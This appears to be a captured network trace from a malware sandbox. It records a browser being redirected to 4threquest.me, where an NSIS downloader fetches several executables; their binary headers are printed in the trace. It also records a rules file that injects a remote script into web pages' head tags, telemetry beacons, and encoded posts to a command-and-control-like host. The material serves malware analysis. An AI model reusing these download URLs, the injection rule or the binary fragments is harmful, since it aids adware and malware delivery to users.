CF-RAY: 1df6edbc30fe046d-FRA

0..N0..6...0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign..150323000000Z..150715000000Z0..0*........1..F...141125000000Z0.0...U.......0*........%..@...141125000000Z0.0...U.......0*........%..D...141125000000Z0.0...U......../0-0...U.......0...U.#..0.....K...E$.MP.c.......0...*.H...............Z.v..&...B.....x)....'.u.}.r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R. .....rS....t.T_.....Y.R......p OS..2.s........(C.e.x3.#.d6L.d=.UI.;T..G...mx....... .......-........-.....J....$.Ko.e#......3....*..3.s...0.........N..W?'.U...f..h..e...m.9.HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:56 GMT..Content-Type: application/x-pkcs7-crl..Content-Length: 594..Connection: keep-alive..Set-Cookie: __cfduid=d25feb04b850f57981ac8c792aba941aa1430435516; expires=Fri, 29-Apr-16 23:11:56 GMT; path=/; domain=.globalsign.net; HttpOnly..Expires: Wed, 15 Jul 2015 00:00:00 GMT..Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT..Cache-Control: public, max-age=6482884..CF-Cache-Status: HIT..Accept-Ranges: bytes..Server: cloudflare-nginx..CF-RAY: 1df6edbc30fe046d-FRA..0..N0..6...0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign..150323000000Z..150715000000Z0..0*........1..F...141125000000Z0.0...U.......0*........%..@...141125000000Z0.0...U.......0*........%..D...141125000000Z0.0...U......../0-0...U.......0...U.#..0.....K...E$.MP.c.......0...*.H...............Z.v..&...B.....x)....'.u.}.r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R. .....rS....t

<<< skipped >>>

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:51 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=119928, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 22:15:51 GMT

Expires: Sat, 02 May 2015 10:15:51 GMT

ETag: "b2a2c0ce8f0f9b25572e41e1706cd0a01fa1f1ef"

Content-Length: 1741

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0.....0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G2..20150430221551Z0d0b0:0... .........#o..K......#..... ...:....g(.....An ............20150430221551Z....20150502101551Z0...*.H.............oI..C>./|..o.....{.#..C....a.......V. H..j"P.....*M:m...&...s.....5/|49..|.....N....6..{.Z...H.I,..(...,....\k..w.%A....@.......)f.>:.;..^. .k...}.]._...?=bF?.....J.:.O.$.. .N..O.......Bg......9....UYx.".....\..W..]L..0.I_.....g..f..I.8....K^.;....oK.R........0...0...0..q..........t....o0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...150316070000Z..160316070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p.........0..0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0@..U...90705.3.1./hXXp://crl.godaddy.com/repository/gdroot-g2.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H.............bW%D.2.X..U[0d..........|.BaG.Y.?.u...\...M..

<<< skipped >>>

GET /mobile/MobiMidia_validation.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.mobimidia.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:07:06 GMT

Server: Apache

Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT

ETag: "1b34285-23a2-4e9bb7c92e340"

Accept-Ranges: bytes

Content-Length: 9122

Connection: close

Content-Type: application/x-javascript

if (ID_MobiMidia_Serv != '') {. . ApiBlock = false;. //document.write(unescape(""));. . document.write(unescape(""));. . . . document.write(unescape(""));. function MobiMidia_addOption(selectId, txt, val, selected) {..var objOption = new Option(txt, val, selected);..self.document.getElementById(selectId).options.add(objOption);. }. function MobiMidia_keyNumber(e) {. if (e.keyCode != 9 && e.keyCode != 13) {. var keyChar = String.fromCharCode(e.which ? e.which : e.keyCode);. filteredValues = "1234567890";. if ((filteredValues.indexOf(keyChar) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 46)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(keyChar.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return false;. }. }. function MobiMidia_AtivaCel() {. if (self.document.getElementById('MobiMidia_DDD').value.length == 2) {. self.document.getElementById('MobiMidia_Number').focus();. }. }. . function MobiMidia_NonoDigito() {. if (self.document.getElementById('MobiMidia_DDD').value < 30) {.

<<< skipped >>>

GET /ironsrc_prot.png?nocache=1 HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: desprotetordelinks.me

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:09 GMT

Content-Type: image/png

Content-Length: 14566

Connection: keep-alive

Last-Modified: Mon, 16 Mar 2015 23:54:21 GMT

ETag: "5720b2-38e6-5117091a3e540"

X-Cache: MISS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

Accept-Ranges: bytes

.PNG........IHDR...&.........2.K.....pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756 HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT

If-None-Match: "804047d4e66d01:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: ctldl.windowsupdate.com

HTTP/1.1 304 Not Modified

Content-Type: application/octet-stream

Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT

ETag: "804047d4e66d01:0"

Cache-Control: max-age=86400

Date: Thu, 30 Apr 2015 23:11:15 GMT

Connection: keep-alive

HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT..ETag: "804047d4e66d01:0"..Cache-Control: max-age=86400..Date: Thu, 30 Apr 2015 23:11:15 GMT..Connection: keep-alive..

GET /310714d/310714_mb.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: 4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:40 GMT

Content-Type: application/octet-stream

Content-Length: 36948

Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................0...............................................s....... ...............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc........ .......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /310714d/310714_is.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: 4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:40 GMT

Content-Type: application/octet-stream

Content-Length: 688202

Last-Modified: Sat, 11 Apr 2015 13:41:40 GMT

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

CC: UA

Accept-Ranges: bytes

MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................@.............@.................................N............@..............................P.......T...........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...T...........................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.

<<< skipped >>>

GET /310714d/240714_ps.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: 4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:43 GMT

Content-Type: application/force-download

Connection: keep-alive

X-Powered-By: PHP/5.4.30

Content-Length: 523272

Content-Description: File Transfer

Content-Disposition: attachment; filename="240714_ps.exe"

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: BYPASS

CC: UA

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z....... ...0.......p....@.......................... ...............................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......p...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....nD..H.P.u..u..u...Hr@..B...SV.5.nD..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .

<<< skipped >>>

GET /310714d/310714_a9.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: 4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:44 GMT

Content-Type: application/force-download

Connection: keep-alive

X-Powered-By: PHP/5.4.30

Content-Length: 503904

Content-Description: File Transfer

Content-Disposition: attachment; filename="310714_a9.exe"

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: BYPASS

CC: UA

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;...;...;...]r_.|....<V.<....Z\......Z^.p....Z_.....2...(...;.......]rB.6...]rX.:...;...:...]r].:...Rich;...................PE..L...X,.U.................<...T......3o.......P....@..................................t....@..................................i..........................`........;..`S..8............................D..@............P...............................text....:.......<.................. ..`.rdata...(...P...*...@..............@..@.data....g.......F...j..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..V...y-...E..t.V..6.......^]...................O-.............U..j.h.;E.d.....P.... .F.3..E.VWP.E.d........}.j..u...&...E......F......F...F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E...F..P,..h.YF..E.P.E. bE..%e..WV..#........M.d......Y_^.M.3..4 ....]....V..V..$...F,.....t.P..3......F,.....F$..t.P..3......F$.....F...t.P..3......F......F...t.P..3......F......F...t.P..3......F......F...t.P..3......F.......^..%....U..V.u..... .... bE...^]........U...E..V....daE.t.V.

<<< skipped >>>

GET /310714d/310714_cp.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: 4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:45 GMT

Content-Type: application/force-download

Connection: keep-alive

X-Powered-By: PHP/5.4.30

Content-Length: 101527

Content-Description: File Transfer

Content-Disposition: attachment; filename="310714_cp.exe"

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: BYPASS

CC: UA

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@..................................................................................p...............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata.......p...........................rsrc........p......................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /310714d/310714_ub.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: 4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 401 Unauthorized

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:45 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.30

0......

GET /310714d/310714_am2.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: 4threquest.me

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:45 GMT

Content-Type: application/force-download

Connection: keep-alive

X-Powered-By: PHP/5.4.30

Content-Length: 311296

Content-Description: File Transfer

Content-Disposition: attachment; filename="310714_am2.exe"

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

X-Cache: BYPASS

CC: UA

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x....u...u...u..a....u..o....u.3W....u.......u.....7.u.......u..a....u...t.*.u.......u.......u.......u.Rich..u.........................PE..L......T..........................................@.......................................@..................................|..........(........................)..................................xR..@...............L............................text............................... ..`.rdata..............................@..@.data....:...........v..............@....rsrc...(...........................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................................................j...4...............................t.j.j.j.P....D...P....D.....................3.9.................t.j.j.j.P....D...P....D....>....................t.j.j.j.P....D...P....D.....3..H..H.........3....D....D..|.D..x.D....D..x.D..................=\.D..u.3...=`.D...L.D.s..L.D..U..j.h..C.d.....PSVW.D.D.3.P.E.d......E..}....LD......3.3..O.._.f.W..]..O8._4f.W$.w@.E...N.3..^.f.....Q..U....I.f.....f;.u. M...Q.*....GtHJD.................._x............................................_l._p.......Gh....._`._d.........

<<< skipped >>>

GET /Bw14Po HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: goo.gl

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=UTF-8

Cache-Control: no-cache, no-store, max-age=0, must-revalidate

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Date: Thu, 30 Apr 2015 23:07:04 GMT

Location: hXXp://VVV.4threquest.me/registro/310113f8.htm

Content-Encoding: gzip

X-Content-Type-Options: nosniff

X-Frame-Options: SAMEORIGIN

X-XSS-Protection: 1; mode=block

Content-Length: 191

Server: GSE

Alternate-Protocol: 80:quic,p=1

..........m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_..........3..u.}.z.. ....HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Cache-Control: no-cache, no-store, max-age=0, must-revalidate..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Date: Thu, 30 Apr 2015 23:07:04 GMT..Location: hXXp://VVV.4threquest.me/registro/310113f8.htm..Content-Encoding: gzip..X-Content-Type-Options: nosniff..X-Frame-Options: SAMEORIGIN..X-XSS-Protection: 1; mode=block..Content-Length: 191..Server: GSE..Alternate-Protocol: 80:quic,p=1............m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_..........3..u.}.z.. ......

GET /v4/sof-ient/535559167_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:39 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"1.97 ms","message":"store 3 action and 5 update "}..0......

GET /v4/sof-ient/535559167_198339_B48A115F?action1=install.pcm HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:40 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"1.25 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"1.25 ms","message":"store 1 action and 0 update "}..0..

GET /services/rules.txt?dummy=328 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.ninjasoftwarellc.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:24 GMT

Content-Type: text/plain

Content-Length: 197

Connection: keep-alive

Last-Modified: Thu, 30 Apr 2015 22:05:54 GMT

ETag: "57c94d-c5-514f84ca6d480"

P3P: CP="Potato"

X-Cache: MISS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

Accept-Ranges: bytes

</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>.ncupons|nncupons.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:24 GMT..Content-Type: text/plain..Content-Length: 197..Connection: keep-alive..Last-Modified: Thu, 30 Apr 2015 22:05:54 GMT..ETag: "57c94d-c5-514f84ca6d480"..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..Accept-Ranges: bytes..</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>.ncupons|nncupons.....

GET /services/update.php?v=1.2.0&key=RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0&dummy=744 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.ninjasoftwarellc.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:25 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

P3P: CP="Potato"

X-Cache: BYPASS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:25 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..

POST /?v=1.03&c=04dec24f&at=620310157&cntr=0 HTTP/1.1

Accept: */*

Host: info.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 152

Cache-Control: no-cache

6l7GU7LYt04pVHc/00d7JpnsyIlcQScF0Zt4fhTcnqAudVVTHAkQvjbNdQcTQVWncSm617pM7dCpzGdczEzIc45kZsS9dv8pqDIWlb4QaSVK72mxtb2fZpL7YThHh9D3L7nkLApli1btouR P4d9XA==

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Date: Thu, 30 Apr 2015 23:07:06 GMT

Content-Length: 960

Connection: keep-alive

DNbcdwG83oyorjbtSlYTH1HSdlfAgwyTnepVoXNiT6jaqu/4vykAfyCEvwNaH 2xXyb85bsm99PmTeo3wq/jrGJIp2SJ8VAcn1FnN1kDbz 9X78YjUOfgugO3NIJwaSyfzDvXZzkR/tFkQxxZqWjj62WXUjbeUqYzkgZZwa9griaFWqreOMMn8P88ri3 K/65j0uF1Q/DBR3Ewlsp4HW PfyGsb0FQJlcllJ2E/7Y6SGNzYmYHtF i/dLKEynEEDqSCqSmv7hGdByYWZdAKhUFVGNRIeyosQOrgGNifNkDwfljb1eY Upvhz0xnUU51fk48mfOCygFPWdVYN6twDeVx3mI18zOz4bCxXVBiLSw/i9yEOo4i2tRaDmV09Rrk/ QhZC Z6j0H1I8qUek8MzVCgqYoDsX/13ysx40E9F0fSD/tbedMvJWTSYkO/TXb0sY3O7zhC8yQbJGORLjeg98mwuB1wGZCDc0Aj/F3Zev9Vec7Xr5Hsf8aSuQ2bbZP dKcxWjvFYPpexl8WtLO4UCI1EVzoWHYDm 1MOVn5taYtzqq13oFvaK7vfUAGfmgYHuaf8nTzRS0IJa3NbpvROTAeUWpTusaRSIQGtT515hc4341dTvNLK6u7VukLbxWVLKHIvMfZxubP/QYujEjiwf21K7 nZaEMEMpGlY6FmD5C63YKyNopqYXsse8r30p4l/F dsOQQRPRKkPGO4y/BookvwEQiDzf1pe2q1nbgrTdPVb/lGdzLChzCkf gIGsN68p2gY7EG49xG4YSAzyhVekJp1DlFbC7i pvbD1XZKMAVJkbtO0PcxgnPmBaC3le7ZevUcf1huI2frYfKNL2h/8nZaenjFhjI26t DtNle9mPkB BhKGXLYoDm 2zRNxP/TAziyXOTC viDy83WtyHCQiBD/jtxSnF5f /GkNFn9wIpc1o6DVebDdHlMmEHTTP/1.1 200 OK..Access-Control-Allow-Origin: *..Date: Thu, 30 Apr 2015 23:07:06 GMT..Content-Length: 960..Connection: keep-alive..DNbcdwG83oyorjbtSlYTH1HSdlfAgwyTnepVoXNiT6jaqu/4vykAfyCEvwNaH 2xXyb85bsm99PmTeo3wq/jrGJIp2SJ8VAcn1FnN1kDbz 9X78YjUOfgugO3NIJwaSyfzDvXZzkR/tFkQxxZqWjj62WXUjbeUqYzkgZZwa9griaFWqreOMMn8P88ri3 K/65j0uF1Q/DBR3Ewlsp4HW PfyGsb0FQJlcllJ2E/7Y6SGNzYmYHtF i/dLKEynEEDqSCqSmv7hGdByYWZdAKhUFVGNRIeyosQOrgGNifNkDwfljb1eY Upvhz0xnUU51fk48mfOCygFPWdVYN6twDeVx3mI18zOz4bCxXVBiLSw/i9yEOo4i2tRaDmV09Rrk/ QhZC Z6j0H1I8qUek8MzVCgqYoDsX/13ysx40E9F0fSD/tbedMvJWTSYkO/T

<<< skipped >>>

